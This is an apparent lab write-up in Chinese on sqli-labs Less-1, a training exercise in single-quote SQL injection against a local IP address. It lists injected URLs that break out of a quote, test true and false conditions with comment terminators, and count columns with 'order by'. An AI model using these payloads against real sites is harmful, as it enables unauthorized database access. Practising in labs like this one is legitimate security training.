Less-1单引号闭合
1、正常页面
2、输入单引号后,页面出现报错信息。
http://192.168.195.110/sqli-labs/Less-1/?id=1’
http://192.168.195.110/sqli-labs/Less-1/?id=1’ and 1=1 – +显示正常
http://192.168.195.110/sqli-labs/Less-1/?id=1’ and 1=2 – + 显示异常
说明存在注入漏洞
3、order by 断段列数,到4时,页面显示异常,说明前面查询了3列。
http://192.168.195.110/sqli-labs/Less-1/?id=1’ order by 4 – +